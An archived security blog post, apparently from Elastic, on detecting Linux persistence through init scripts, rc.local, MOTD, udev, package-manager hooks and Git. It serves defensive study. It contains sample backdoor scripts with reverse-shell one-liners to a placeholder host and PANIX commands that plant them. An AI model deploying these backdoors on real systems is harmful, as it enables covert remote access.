{
	"id": "6d84d42c-f935-4e9a-9903-a5eaa31d3e6d",
	"created_at": "2026-04-06T00:14:22.908352Z",
	"updated_at": "2026-04-10T03:24:18.030036Z",
	"deleted_at": null,
	"sha1_hash": "ac5e1ae9222a705f18b7ba216fa2fad095e0a9e6",
	"title": "Linux Detection Engineering - A Sequel on Persistence Mechanisms",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4881998,
	"plain_text": "Linux Detection Engineering - A Sequel on Persistence\r\nMechanisms\r\nBy Ruben Groenewoud\r\nPublished: 2024-08-30 · Archived: 2026-04-05 13:08:57 UTC\r\nIntroduction\r\nIn this third part of the Linux Detection Engineering series, we’ll dive deeper into the world of Linux persistence.\r\nWe start with common or straightforward methods and move towards more complex or obscure techniques. The\r\ngoal remains the same: to educate defenders and security researchers on the foundational aspects of Linux\r\npersistence by examining both trivial and more complicated methods, understanding how these methods work,\r\nhow to hunt for them, and how to develop effective detection strategies.\r\nIn the previous article - \"Linux Detection Engineering - a primer on persistence mechanisms\" - we explored the\r\nfoundational aspects of Linux persistence techniques. If you missed it, you can find it here.\r\nWe'll set up the persistence mechanisms, analyze the logs, and observe the potential detection opportunities. To aid\r\nin this process, we’re sharing PANIX, a Linux persistence tool that Ruben Groenewoud of Elastic Security\r\ndeveloped. PANIX simplifies and customizes persistence setup to test potential detection opportunities.\r\nBy the end of this series, you'll have gained a comprehensive understanding of each of the persistence\r\nmechanisms that we covered, including:\r\nHow it works (theory)\r\nHow to set it up (practice)\r\nHow to detect it (SIEM and Endpoint rules)\r\nHow to hunt for it (ES|QL and OSQuery reference hunts)\r\nLet’s go beyond the basics and dig a little bit deeper into the world of Linux persistence, it’s fun!\r\nSetup note\r\nTo ensure you are prepared to detect the persistence mechanisms discussed in this article, it is important to enable\r\nand update our pre-built detection rules. If you are working with a custom-built ruleset and do not use all of our\r\npre-built rules, this is a great opportunity to test them and potentially fill in any gaps. Now, we are ready to get\r\nstarted.\r\nT1037 - boot or logon initialization scripts: Init\r\nInit, short for \"initialization,\" is the first process started by the kernel during the boot process on Unix-like\r\noperating systems. It continues running until the system is shut down. The primary role of an init system is to\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 1 of 25\n\nstart, stop, and manage system processes and services.\r\nThere are three major init implementations - Systemd, System V, and Upstart. In part 1 of this series, we focused\r\non Systemd. In this part, we will explore System V and Upstart. MITRE does not have specific categories for\r\nSystem V or Upstart. These are generally part of T1037.\r\nT1037 - boot or logon initialization scripts: System V init\r\nSystem V (SysV) init is one of the oldest and most traditional init systems. SysV init scripts are gradually being\r\nreplaced by modern init systems like Systemd. However, systemd-sysv-generator allows Systemd to handle\r\ntraditional SysV init scripts, ensuring older services and applications can still be managed within the newer\r\nframework.\r\nThe /etc/init.d/ directory is a key component of the SysV init system. It is responsible for controlling the\r\nstartup, running, and shutdown of services on a system. Scripts in this directory are executed at different run levels\r\nto manage various system services. Despite the rise of Systemd as the default init system in many modern Linux\r\ndistributions, init.d scripts are still widely used and supported, making them a viable option for persistence.\r\nThe scripts in init.d are used to start, stop, and manage services. These scripts are executed with root\r\nprivileges, providing a powerful means for both administrators and attackers to ensure certain commands or\r\nservices run on boot. These scripts are often linked to runlevel directories like /etc/rc0.d/ , /etc/rc1.d/ , etc.,\r\nwhich determine when the scripts are run. Runlevels, ranging from 0 to 6, define specific operational states, each\r\nconfiguring different services and processes to manage system behavior and user interactions. Runlevels vary\r\ndepending on the distribution, but generally look like the following:\r\n0: Shutdown\r\n1: Single User Mode\r\n2: Multiuser mode without networking\r\n3: Multiuser mode with networking\r\n4: Unused\r\n5: Multiuser mode with networking and GUI\r\n6: Reboot\r\nDuring system startup, scripts are executed based on the current runlevel configuration. Each script must follow a\r\nspecific structure, including start , stop , restart , and status commands to manage the associated\r\nservice. Scripts prefixed with S (start) or K (kill) dictate actions during startup or shutdown, respectively,\r\nordered by their numerical sequence.\r\nAn example of a malicious init.d script might look similar to the following:\r\n#! /bin/sh\r\n### BEGIN INIT INFO\r\n# Provides: malicious-sysv-script\r\n# Required-Start: $remote_fs $syslog\r\n# Required-Stop: $remote_fs $syslog\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 2 of 25\n\n# Default-Start: 2 3 4 5\r\n# Default-Stop: 0 1 6\r\n### END INIT INFO\r\ncase \"$1\" in\r\n start)\r\n echo \"Starting malicious-sysv-script\"\r\n nohup setsid bash -c 'bash -i \u003e\u0026 /dev/tcp/$ip/$port 0\u003e\u00261'\r\n ;;\r\nesac\r\nThe script must be placed in the /etc/init.d/ directory and be granted execution permissions. Similarly to\r\nSystemd services, SysV scripts must also be enabled. A common utility to manage SysV configurations is\r\nupdate-rc.d . It allows administrators to enable or disable services and manage the symbolic links (start and kill\r\nscripts) in the /etc/rc*.d/ directories, automatically setting the correct runlevels based on the configuration of\r\nthe script.\r\nsudo update-rc.d malicious-sysv-script defaults\r\nThe malicious-sysv-script is now enabled and ready to run on boot. MITRE specifies more information and\r\nreal-world examples related to this technique in T1037.\r\nPersistence through T1037 - System V init\r\nYou can manually set up a test script within the /etc/init.d/ directory, grant it execution permissions, enable it,\r\nand reboot it, or simply use PANIX. PANIX is a Linux persistence tool that simplifies and customizes persistence\r\nsetup for testing your detections. We can use it to establish persistence simply by running:\r\n\u003e sudo ./panix.sh --initd --default --ip 192.168.1.1 --port 2006\r\n\u003e [+] init.d backdoor established with IP 192.168.1.1 and port 2006.\r\nPrior to rebooting and actually establishing persistence, we can see the following documents being generated in\r\nDiscover:\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 3 of 25\n\nEvents generated as a result of System V init persistence establishment\r\nAfter executing PANIX, it generates a SysV init script named /etc/init.d/ssh-procps , applies executable\r\npermissions using chmod +x , and utilizes update-rc.d . This command triggers systemctl daemon-reload ,\r\nwhich, in turn, activates the systemd-sysv-generator to enable ssh-procps during system boot.\r\nLet’s reboot the system and look at the events that are generated on shutdown/boot.\r\nEvents generated as a result of System V init persistence establishment\r\nAs the SysV init system is loaded early, the start command is not logged. Since it is impossible to detect an event\r\nbefore events are being ingested, we need to be creative in detecting this technique. Elastic will capture\r\nalready_running event actions for service initialization events. Through this chain we are capable of detecting\r\nthe execution of the service, followed by the reverse shell that was initiated. We have several detection\r\nopportunities for this persistence technique.\r\nHunting for T1037 - System V init\r\nOther than relying on detections, it is important to incorporate threat hunting into your workflow, especially for\r\npersistence mechanisms like these, where events can potentially be missed due to timing. This blog will solely list\r\nthe available hunts for each persistence mechanism; however, more details regarding this topic are outlined at the\r\nend of the first section in the previous article on persistence. Additionally, descriptions and references can be\r\nfound in our Detection Rules repository, specifically in the Linux hunting subdirectory.\r\nWe can hunt for System V Init persistence through ES|QL and OSQuery, focusing on unusual process executions\r\nand file creations. The Persistence via System V Init rule contains several ES|QL and OSQuery queries that can\r\nhelp hunt for these types of persistence.\r\nT1037 - boot or logon initialization scripts: Upstart\r\nUpstart was introduced as an alternative init system designed to improve boot performance and manage system\r\nservices more dynamically than traditional SysV init. While it has been largely supplanted by systemd in many\r\nLinux distributions, Upstart is still used in some older releases and legacy systems.\r\nThe core of Upstart's configuration resides in the /etc/init/ directory, where job configuration files define how\r\nservices are started, stopped, and managed. Each job file specifies dependencies, start conditions, and actions to be\r\ntaken upon start, stop, and other events.\r\nIn Upstart, run levels are replaced with events and tasks, which define the sequence and conditions under which\r\njobs are executed. Upstart introduces a more event-driven model, allowing services to start based on various\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 4 of 25\n\nsystem events rather than predefined run levels.\r\nUpstart can run system-wide or in user-session mode. While system-wide configurations are placed in the\r\n/etc/init/ directory, user-session mode configurations are located in:\r\n~/.config/upstart/\r\n~/.init/\r\n/etc/xdg/upstart/\r\n/usr/share/upstart/sessions/\r\nAn example of an Upstart job file can look like this:\r\ndescription \"Malicious Upstart Job\"\r\nauthor \"Ruben Groenewoud\"\r\nstart on runlevel [2345]\r\nstop on shutdown\r\nexec nohup setsid bash -c 'bash -i \u003e\u0026 /dev/tcp/$ip/$port 0\u003e\u00261'\r\nThe malicious-upstart-job.conf file defines a job that starts on run levels 2, 3, 4, and 5 (general Linux access\r\nand networking), and stops on run levels 0, 1, and 6 (shutdown/reboot). The exec line executes the malicious\r\npayload to establish a reverse shell connection when the system boots up.\r\nTo enable the Upstart job and ensure it runs on boot, the job file must be placed in /etc/init/ and given\r\nappropriate permissions. Upstart jobs are automatically recognized and managed by the Upstart init daemon .\r\nUpstart was deprecated a long time ago, with Linux distributions such as Debian 7 and Ubuntu 16.04 being the\r\nfinal systems that leverage Upstart by default. These systems moved to the SysV init system, removing\r\ncompatibility with Upstart altogether. Based on the data in our support matrix, only the Elastic Agent in Beta\r\nversion supports some of these old operating systems, and the recent version of Elastic Defend does not run on\r\nthem at all. These systems have been EOL for years and should not be used in production environments anymore.\r\nBecause of this reason, we added support/coverage for this technique to the Potential Persistence via File\r\nModification detection rule. If you are still running these systems in production, using, for example, old versions\r\nof Auditbeat to gather its logs, you can set up Auditbeat file creation and FIM file modification rules in the\r\n/etc/init/ directory, similar to the techniques mentioned in the previous blog, and in the sections yet to come.\r\nSimilarly to System V Init, information and real-world examples related to this technique are specified by MITRE\r\nin T1037.\r\nT1037.004 - boot or logon initialization scripts: run control (RC) scripts\r\nThe rc.local script is a traditional method for executing commands or scripts on Unix-like operating systems\r\nduring system boot. It is located at /etc/rc.local and is typically used to start services, configure networking,\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 5 of 25\n\nor perform other system initialization tasks that do not warrant a full init script. In Darwin-based systems and very\r\nfew other Unix-like systems, /etc/rc.common is used for the same purpose.\r\nNewer versions of Linux distributions have phased out the /etc/rc.local file in favor of Systemd for handling\r\ninitialization scripts. Systemd provides compatibility through the systemd-rc-local-generator generator; this\r\nexecutable ensures backward compatibility by checking if /etc/rc.local exists and is executable. If it meets\r\nthese criteria, it integrates the rc-local.service unit into the boot process. Therefore, as long as this generator\r\nis included in the Systemd setup, /etc/rc.local scripts will execute during system boot. In RHEL derivatives,\r\n/etc/rc.d/rc.local must be granted execution permissions for this technique to work.\r\nThe rc.local script is a shell script that contains commands or scripts to be executed once at the end of the\r\nsystem boot process, after all other system services have been started. This makes it useful for tasks that require\r\nspecific system conditions to be met before execution. Here’s an example of how a simple backdoored rc.local\r\nscript might look:\r\n#!/bin/sh\r\n/bin/bash -c 'sh -i \u003e\u0026 /dev/tcp/$ip/$port 0\u003e\u00261'\r\nexit 0\r\nThe command above creates a reverse shell by opening a bash session that redirects input and output to a specified\r\nIP address and port, allowing remote access to the system.\r\nTo ensure rc.local runs during boot, the script must be marked executable. On the next boot, the systemd-rc-local-generator will create the necessary symlink in order to enable the rc-local.service and execute the\r\nrc.local script. RC scripts did receive their own sub-technique by MITRE. More information and examples of\r\nreal-world usage of RC Scripts for persistence can be found in T1037.004.\r\nPersistence through T1037.004 - run control (RC) scripts\r\nAs long as the systemd-rc-local-generator is present, establishing persistence through this technique is simple.\r\nCreate the /etc/rc.local file, add your payload, and mark it as executable. We will leverage the following\r\nPANIX command to establish it for us.\r\n\u003e sudo ./panix.sh --rc-local --default --ip 192.168.1.1 --port 2007\r\n\u003e [+] rc.local backdoor established\r\nAfter rebooting the system, we can see the following events being generated:\r\nEvents generated as a result of RC Script persistence establishment\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 6 of 25\n\nThe same issue as before arises. We see the execution of PANIX, creating the /etc/rc.local file and granting it\r\nexecution permissions. When running systemctl daemon-reload , we can see the systemd-rc-local-generator\r\ncreating a symlink in the /run/systemd/generator[.early|late] directories.\r\nSimilar to the previous example in which we ran into this issue, we can again use the already_running\r\nevent.action documents to get some information on the executions. Digging into this, one method that detects\r\npotential traces of rc.local execution is to search for documents containing /etc/rc.local start entries:\r\nEvents generated as a result of rc.local service status\r\nWhere we see /etc/rc.local being started, after which a suspicious command is executed. The /opt/bds_elf\r\nis a rootkit, leveraging rc.local as a persistence method.\r\nAdditionally, we can leverage the syslog data source, as this file is parsed on initialization of the system\r\nintegration. You can set up Filebeat or the Elastic Agent with the System integration to harvest syslog. When\r\nlooking at potential errors in its execution logs, we can detect other traces of rc.local execution events for both\r\nour testing and rootkit executions:\r\nEvents generated as a result of /etc/rc.local syslog error messages\r\nBecause of the challenges in detecting these persistence mechanisms, it is very important to catch traces as early\r\nin the chain as possible. Leveraging a multi-layered defense strategy increases the chances of detecting techniques\r\nlike these.\r\nHunting for T1037.004 - run control (RC) scripts\r\nSimilar to the System V Init detection opportunity limitations, this technique deals with the same limitations due\r\nto timing. Thus, hunting for RC Script persistence is important. We can hunt for this technique by looking at\r\n/etc/rc.local file creations and/or modifications and the existence of the rc-local.service systemd\r\nunit/startup item. The Persistence via rc.local/rc.common rule contains several ES|QL and OSQuery queries that\r\naid in hunting for this technique.\r\nT1037 - boot or logon initialization scripts: Message of the Day (MOTD)\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 7 of 25\n\nMessage of the Day (MOTD) is a feature that displays a message to users when they log in via SSH or a local\r\nterminal. To display messages before and after the login process, Linux uses the /etc/issue and the /etc/motd\r\nfiles. These messages display on the command line and will not be seen before and after a graphical login. The\r\n/etc/issue file is typically used to display a login message or banner, while the /etc/motd file generally\r\ndisplays issues, security policies, or messages. These messages are global and will display to all users at the\r\ncommand line prompt. Only a privileged user (such as root) can edit these files.\r\nIn addition to the static /etc/motd file, modern systems often use dynamic MOTD scripts stored in\r\n/etc/update-motd.d/ . These scripts generate dynamic content that can be included in the MOTD, such as\r\ncurrent system metrics, weather updates, or news headlines.\r\nThese dynamic scripts are shell scripts that execute shell commands. It is possible to create a new file within this\r\ndirectory or to add a backdoor to an existing one. Once the script has been granted execution permissions, it will\r\nexecute every time a user logs in.\r\nRHEL derivatives do not make use of dynamic MOTD scripts in a similar way as Debian does, and are not\r\nsusceptible to this technique.\r\nAn example of a backdoored /etc/update-motd.d/ file could look like this:\r\n#!/bin/sh\r\nnohup setsid bash -c 'bash -i \u003e\u0026 /dev/tcp/$ip/$port 0\u003e\u00261'\r\nLike before, MITRE does not have a specific technique related to this. Therefore we classify this technique as\r\nT1037.\r\nPersistence through T1037 - message of the day (MOTD)\r\nA payload similar to the one presented above should be used to ensure the backdoor does not interrupt the SSH\r\nlogin, potentially triggering the user’s attention. We can leverage PANIX to set up persistence on Debian-based\r\nsystems through MOTD like so:\r\n \u003e sudo ./panix.sh --motd --default --ip 192.168.1.1 --port 2008\r\n\u003e [+] MOTD backdoor established in /etc/update-motd.d/137-python-upgrades\r\nTo trigger the backdoor, we can reconnect to the server via SSH or reconnect to the terminal.\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 8 of 25\n\nEvents generated as a result of Message of the Day (MOTD) persistence establishment\r\nIn the image above we can see PANIX being executed, which creates the /etc/update-motd.d/137-python-upgrades file and marks it as executable. Next, when a user connects to SSH/console, the payload is executed,\r\nresulting in an egress network connection by the root user. This is a straightforward attack chain, and we have\r\nseveral layers of detections for this:\r\nHunting for T1037 - message of the day (MOTD)\r\nHunting for MOTD persistence can be conducted through ES|QL and OSQuery. We can do so by analyzing file\r\ncreations in these directories and executions from MOTD parent processes. We created the Persistence via\r\nMessage-of-the-Day rule aid in this endeavor.\r\nT1546 - event triggered execution: udev\r\nUdev is the device manager for the Linux kernel, responsible for managing device nodes in the /dev directory. It\r\ndynamically creates or removes device nodes, manages permissions, and handles various events triggered by\r\ndevice state changes. Essentially, Udev acts as an intermediary between the kernel and user space, ensuring that\r\nthe operating system appropriately handles hardware changes.\r\nWhen a new device is added to the system (such as a USB drive, keyboard, or network interface), Udev detects\r\nthis event and applies predefined rules to manage the device. Each rule consists of key-value pairs that match\r\ndevice attributes and actions to be performed. Udev rules files are processed in lexical order, and rules can match\r\nvarious device attributes, including device type, kernel name, and more. Udev rules are defined in text files within\r\na default set of directories:\r\n/etc/udev/rules.d/\r\n/run/udev/rules.d/\r\n/usr/lib/udev/rules.d/\r\n/usr/local/lib/udev/rules.d/\r\n/lib/udev/\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 9 of 25\n\nPriority is measured based on the source directory of the rule file and takes precedence based on the order listed\r\nabove ( /etc/ → /run/ → /usr/ ). When a rule matches, it can trigger a wide range of actions, including\r\nexecuting arbitrary commands or scripts. This flexibility makes Udev a potential vector for persistence by\r\nmalicious actors. An example Udev rule looks like the following:\r\nSUBSYSTEM==\"block\", ACTION==\"add|change\", ENV{DM_NAME}==\"ubuntu--vg-ubuntu--lv\", SYMLINK+=\"disk/by-dname/ubuntu\r\nTo leverage this method for persistence, root privileges are required. Once a rule file is created, the rules need to\r\nbe reloaded.\r\nsudo udevadm control --reload-rules\r\nTo test the rule, either perform the action specified in the rule file or use the udevadm trigger utility.\r\nsudo udevadm trigger -v\r\nAdditionally, these drivers can be monitored using udevadm , by running:\r\nudevadm monitor --environment\r\nEder’s blog titled “Leveraging Linux udev for persistence” is a very good read for more information on this topic.\r\nThis technique has several limitations, making it more difficult to leverage the persistence mechanism.\r\nUdev rules are limited to short foreground tasks due to potential blocking of subsequent events.\r\nThey cannot execute programs accessing networks or filesystems, enforced by systemd-udevd.service 's\r\nsandbox.\r\nLong-running processes are terminated after event handling.\r\nDespite these restrictions, bypasses include creating detached processes outside udev rules for executing implants,\r\nsuch as:\r\nLeveraging at / cron / systemd for independent scheduling.\r\nInjecting code into existing processes.\r\nAlthough persistence would be set up through a different technique than udev, udev would still grant a persistence\r\nmechanism for the at / cron / systemd persistence mechanism. MITRE does not have a technique dedicated to\r\nthis mechanism — the most logical technique to add this to would be T1546.\r\nResearchers from AON recently discovered a malware called \"sedexp\" that achieves persistence using Udev rules\r\n- a technique rarely seen in the wild - so be sure to check out their research article.\r\nPersistence through T1546 - udev\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 10 of 25\n\nPANIX allows you to test all three techniques by leveraging --at , --cron and --systemd , respectively. Or go\r\nahead and test it manually. We can set up udev persistence through at , by running the following command:\r\n\u003e sudo ./panix.sh --udev --default --ip 192.168.1.1 --port 2009 --at\r\nTo trigger the payload, you can either run sudo udevadm trigger or reboot the system. Let’s analyze the events\r\nin Discover.\r\nEvents generated as a result of Udev At persistence establishment\r\nIn the figure above, PANIX is executed, which creates the /usr/bin/atest backdoor and grants it execution\r\npermissions. Subsequently, the 10-atest.rules file is generated, and the drivers are reloaded and triggered. This\r\ncauses At to be spawned as a child process of udevadm , creating the atspool / atjob , and subsequently\r\nexecuting the reverse shell.\r\nCron follows a similar structure; however, it is slightly more difficult to catch the malicious activity, as the child\r\nprocess of udevadm is bash , which is not unusual.\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 11 of 25\n\nEvents generated as a result of Udev Cron persistence establishment\r\nFinally, when looking at the documents generated by Udev in combination with Systemd, we see the following:\r\nEvents generated as a result of Udev Systemd persistence establishment\r\nWhich also does not show a relationship with udev, other than the 12-systemdtest.rules file that is created.\r\nThis leads these last two mechanisms to be detected through our previous systemd/cron related rules, rather than\r\nspecific udev rules. Let’s take a look at the coverage (We omitted the systemd / cron rules, as these were\r\nalready mentioned in the previous persistence blog):\r\nHunting for T1546 - udev\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 12 of 25\n\nHunting for Udev persistence can be conducted through ES|QL and OSQuery. By leveraging ES|QL, we can\r\ndetect unusual file creations and process executions, and through OSQuery we can do live hunting on our\r\nmanaged systems. To get you started, we created the Persistence via Udev rule, containing several different\r\nqueries.\r\nT1546.016 - event triggered execution: installer packages\r\nPackage managers are tools responsible for installing, updating, and managing software packages. Three widely\r\nused package managers are APT (Advanced Package Tool), YUM (Yellowdog Updater, Modified), and YUM’s\r\nsuccessor, DNF (Danified YUM). Beyond their legitimate uses, these tools can be leveraged by attackers to\r\nestablish persistence on a system by hijacking the package manager execution flow, ensuring malicious code is\r\nexecuted during routine package management operations. MITRE details information related to this technique\r\nunder the identifier T1546.016.\r\nT1546.016 - installer packages (APT)\r\nAPT is the default package manager for Debian-based Linux distributions like Debian, Ubuntu, and their\r\nderivatives. It simplifies the process of managing software packages and dependencies. APT utilizes several\r\nconfiguration mechanisms to customize its behavior and enhance package management efficiency.\r\nAPT hooks allow users to execute scripts or commands at specific points during package installation, removal, or\r\nupgrade operations. These hooks are stored in /etc/apt/apt.conf.d/ and can be leveraged to execute actions\r\npre- and post-installation. The structure of APT configuration files follows a numeric ordering convention to\r\ncontrol the application of configuration snippets that customize various aspects of APT's behavior. A regular APT\r\nhook looks like this:\r\nDPkg::Post-Invoke {\"if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi;\r\nThese configuration files can be exploited by attackers to execute malicious binaries or code whenever an APT\r\noperation is executed. This vulnerability extends to automated processes like auto-updates, enabling persistent\r\nexecution on systems with automatic update features enabled.\r\nPersistence through T1546.016 - installer packages (APT)\r\nTo test this method, a Debian-based system that leverages APT or the manual installation of APT is required.\r\nMake sure that if you perform this step manually, that you do not break the APT package manager, as a carefully\r\ncrafted payload that detaches and runs in the background is necessary to not interrupt the execution chain. You can\r\nsetup APT persistence by running:\r\n\u003e sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2012 --apt\r\n\u003e [+] APT persistence established\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 13 of 25\n\nTo trigger the payload, run an APT command, such as sudo apt update . This will spawn a reverse shell. Let’s\r\ntake a look at the events in Discover:\r\nEvents generated as a result of package manager (APT) persistence establishment\r\nIn the figure above, we see PANIX being executed, creating the 01python-upgrades file, and successfully\r\nestablishing the APT hook. After running sudo apt update , APT reads the configuration file and executes the\r\npayload, initiating the sh → nohup → setsid → bash reverse shell chain. Our coverage is multi-layered,\r\nand detects the following events:\r\nT1546.016 - installer packages (YUM)\r\nYUM (Yellowdog Updater, Modified) is the default package management system used in Red Hat-based Linux\r\ndistributions like CentOS and Fedora. YUM employs plugin architecture to extend its functionality, allowing users\r\nto integrate custom scripts or programs that execute at various stages of the package management lifecycle. These\r\nplugins are stored in specific directories and can perform actions such as logging, security checks, or custom\r\npackage handling.\r\nThe structure of YUM plugins typically involves placing them in directories like:\r\n/etc/yum/pluginconf.d/ (for configuration files)\r\n/usr/lib/yum-plugins/ (for plugin scripts)\r\nFor plugins to be enabled, the /etc/yum.conf file must have the plugins=1 set. These plugins can intercept\r\nYUM operations, modify package installation behaviors, or execute additional actions before or after package\r\ntransactions. YUM plugins are quite extensive, but a basic YUM plugin template might look like this:\r\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\r\nrequires_api_version = '2.3'\r\nplugin_type = (TYPE_CORE, TYPE_INTERACTIVE)\r\ndef init_hook(conduit):\r\n conduit.info(2, 'Hello world')\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 14 of 25\n\ndef postreposetup_hook(conduit):\r\n raise PluginYumExit('Goodbye')\r\nEach plugin must be enabled through a .conf configuration file:\r\n[main]\r\nSimilar to APT's configuration files, YUM plugins can be leveraged by attackers to execute malicious code during\r\nroutine package management operations, particularly during automated processes like system updates, thereby\r\nestablishing persistence on vulnerable systems.\r\nPersistence through T1546.016 - Installer Packages (YUM)\r\nSimilar to APT, YUM plugins should be crafted carefully to not interfere with the YUM update execution flow.\r\nUse this example or set it up by running:\r\n\u003e sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2012 --yum\r\n[+] Yum persistence established\r\nAfter planting the persistence mechanism, a command similar to sudo yum upgrade can be run to establish a\r\nreverse connection.\r\nEvents generated as a result of package manager (YUM) persistence establishment\r\nWe see PANIX being executed, /usr/lib/yumcon , /usr/lib/yum-plugins/yumcon.py and\r\n/etc/yum/pluginconf.d/yumcon.conf being created. /usr/lib/yumcon is executed by yumcon.py , which is\r\nenabled in yumcon.conf . After updating the system, the reverse shell execution chain ( yum → sh → setsid\r\n→ yumcon → python ) is executed. Similar to APT, our YUM coverage is multi-layered, and detects the\r\nfollowing events:\r\nT1546.016 - installer packages (DNF)\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 15 of 25\n\nDNF (Dandified YUM) is the next-generation package manager used in modern Red Hat-based Linux\r\ndistributions, including Fedora and CentOS. It replaces YUM while maintaining compatibility with YUM\r\nrepositories and packages. Similar to YUM, DNF utilizes a plugin system to extend its functionality, enabling\r\nusers to integrate custom scripts or programs that execute at key points in the package management lifecycle.\r\nDNF plugins enhance its capabilities by allowing customization and automation beyond standard package\r\nmanagement tasks. These plugins are stored in specific directories:\r\n/etc/dnf/pluginconf.d/ (for configuration files)\r\n/usr/lib/python3.9/site-packages/dnf-plugins/ (for plugin scripts)\r\nOf course the location for the dnf-plugins are bound to the Python version that is running on your system.\r\nSimilarly to YUM, to enable a plugin, plugins=1 must be set in /etc/dnf/dnf.conf . An example of a DNF\r\nplugin can look like this:\r\nimport dbus\r\nimport dnf\r\nfrom dnfpluginscore import _\r\nclass NotifyPackagekit(dnf.Plugin):\r\nname = \"notify-packagekit\"\r\ndef __init__(self, base, cli):\r\nsuper(NotifyPackagekit, self).__init__(base, cli)\r\nself.base = base\r\nself.cli = cli\r\ndef transaction(self):\r\ntry:\r\nbus = dbus.SystemBus()\r\nproxy = bus.get_object('org.freedesktop.PackageKit', '/org/freedesktop/PackageKit')\r\niface = dbus.Interface(proxy, dbus_interface='org.freedesktop.PackageKit')\r\niface.StateHasChanged('posttrans')\r\nexcept:\r\npass\r\nAs for YUM, each plugin must be enabled through a .conf configuration file:\r\n[main]\r\nSimilar to YUM's plugins and APT's configuration files, DNF plugins can be exploited by malicious actors to\r\ninject and execute unauthorized code during routine package management tasks. This attack vector extends to\r\nautomated processes such as system updates, enabling persistent execution on systems with DNF-enabled\r\nrepositories.\r\nPersistence through T1546.016 - installer packages (DNF)\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 16 of 25\n\nSimilar to APT and YUM, DNF plugins should be crafted carefully to not interfere with the DNF update execution\r\nflow. You can use the following example or set it up by running:\r\n\u003e sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2013 --dnf\r\n\u003e [+] DNF persistence established\r\nRunning a command similar to sudo dnf update will trigger the backdoor. Take a look at the events:\r\nEvents generated as a result of package manager (DNF) persistence establishment\r\nAfter the execution of PANIX, /usr/lib/python3.9/site-packages/dnfcon , /etc/dnf/plugins/dnfcon.conf\r\nand /usr/lib/python3.9/site-packages/dnf-plugins/dnfcon.py are created, and the backdoor is established.\r\nThese locations are dynamic, based on the Python version in use. After triggering it through the sudo dnf\r\nupdate command, the dnf → sh → setsid → dnfcon → python reverse shell chain is initiated. Similar\r\nto before, our DNF coverage is multi-layered, and detects the following events:\r\nHunting for persistence through T1546.016 - installer packages\r\nHunting for Package Manager persistence can be conducted through ES|QL and OSQuery. Indicators of\r\ncompromise may include configuration and plugin file creations/modifications and unusual executions of\r\nAPT/YUM/DNF parents. The Persistence via Package Manager rule contains several ES|QL/OSQuery queries that\r\nyou can use to detect these abnormalities.\r\nT1546 - event triggered execution: Git\r\nGit is a distributed version control system widely used for managing source code and coordinating collaborative\r\nsoftware development. It tracks changes to files and enables efficient team collaboration across different locations.\r\nThis makes Git a system that is present in a lot of organizations across both workstations and servers. Two\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 17 of 25\n\nfunctionalities that can be (ab)used for arbitrary code execution are Git hooks and Git pager. MITRE has no\r\nspecific technique attributed to these persistence mechanisms, but they would best fit T1546.\r\nT1546 - event triggered execution: Git hooks\r\nGit hooks are scripts that Git executes before or after specific events such as commits, merges, and pushes. These\r\nhooks are stored in the .git/hooks/ directory within each Git repository. They provide a mechanism for\r\ncustomizing and automating actions during the Git workflow. Common Git hooks include pre-commit , post-commit , pre-merge , and post-merge .\r\nAn example of a Git hook would be the file .git/hooks/pre-commit , with the following contents:\r\n#!/bin/sh\r\n# Check if this is the initial commit\r\nif git rev-parse --verify HEAD \u003e/dev/null 2\u003e\u00261\r\nthen\r\n echo \"pre-commit: About to create a new commit...\"\r\n against=HEAD\r\nelse\r\n echo \"pre-commit: About to create the first commit...\"\r\n against=4b825dc642cb6eb9a060e54bf8d69288fbee4904\r\nfi\r\nAs these scripts are executed on specific actions, and the contents of the scripts can be changed in whatever way\r\nthe user wants, this method can be abused for persistence. Additionally, this method does not require root\r\nprivileges, making it a convenient persistence technique for instances where root privileges are not yet obtained.\r\nThese scripts can also be added to Github repositories prior to cloning, turning them into initial access vectors as\r\nwell.\r\nT1546 - event triggered execution: git pager\r\nA pager is a program used to view content one screen at a time. It allows users to scroll through text files or\r\ncommand output without the text scrolling off the screen. Common pagers include less, more, and pg. A Git pager\r\nis a specific use of a pager program to display the output of Git commands. Git allows users to configure a pager\r\nto control the display of commands such as git log .\r\nGit determines which pager to use through the following order of configuration:\r\n/etc/gitconfig (system-wide)\r\n~/.gitconfig or ~/.config/git/config (user-specific)\r\n.git/config (repository specific)\r\nA typical configuration where a pager is specified might look like this:\r\n[core]\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 18 of 25\n\npager = less\r\nIn this example, Git is configured to use less as the pager. When a user runs a command like git log , Git will\r\npipe the output through less for easier viewing. The flexibility in specifying a pager can be exploited. For\r\nexample, an attacker can set the pager to a command that executes arbitrary code. This can be done by modifying\r\nthe core.pager configuration to include malicious commands. Let’s take a look at the two techniques 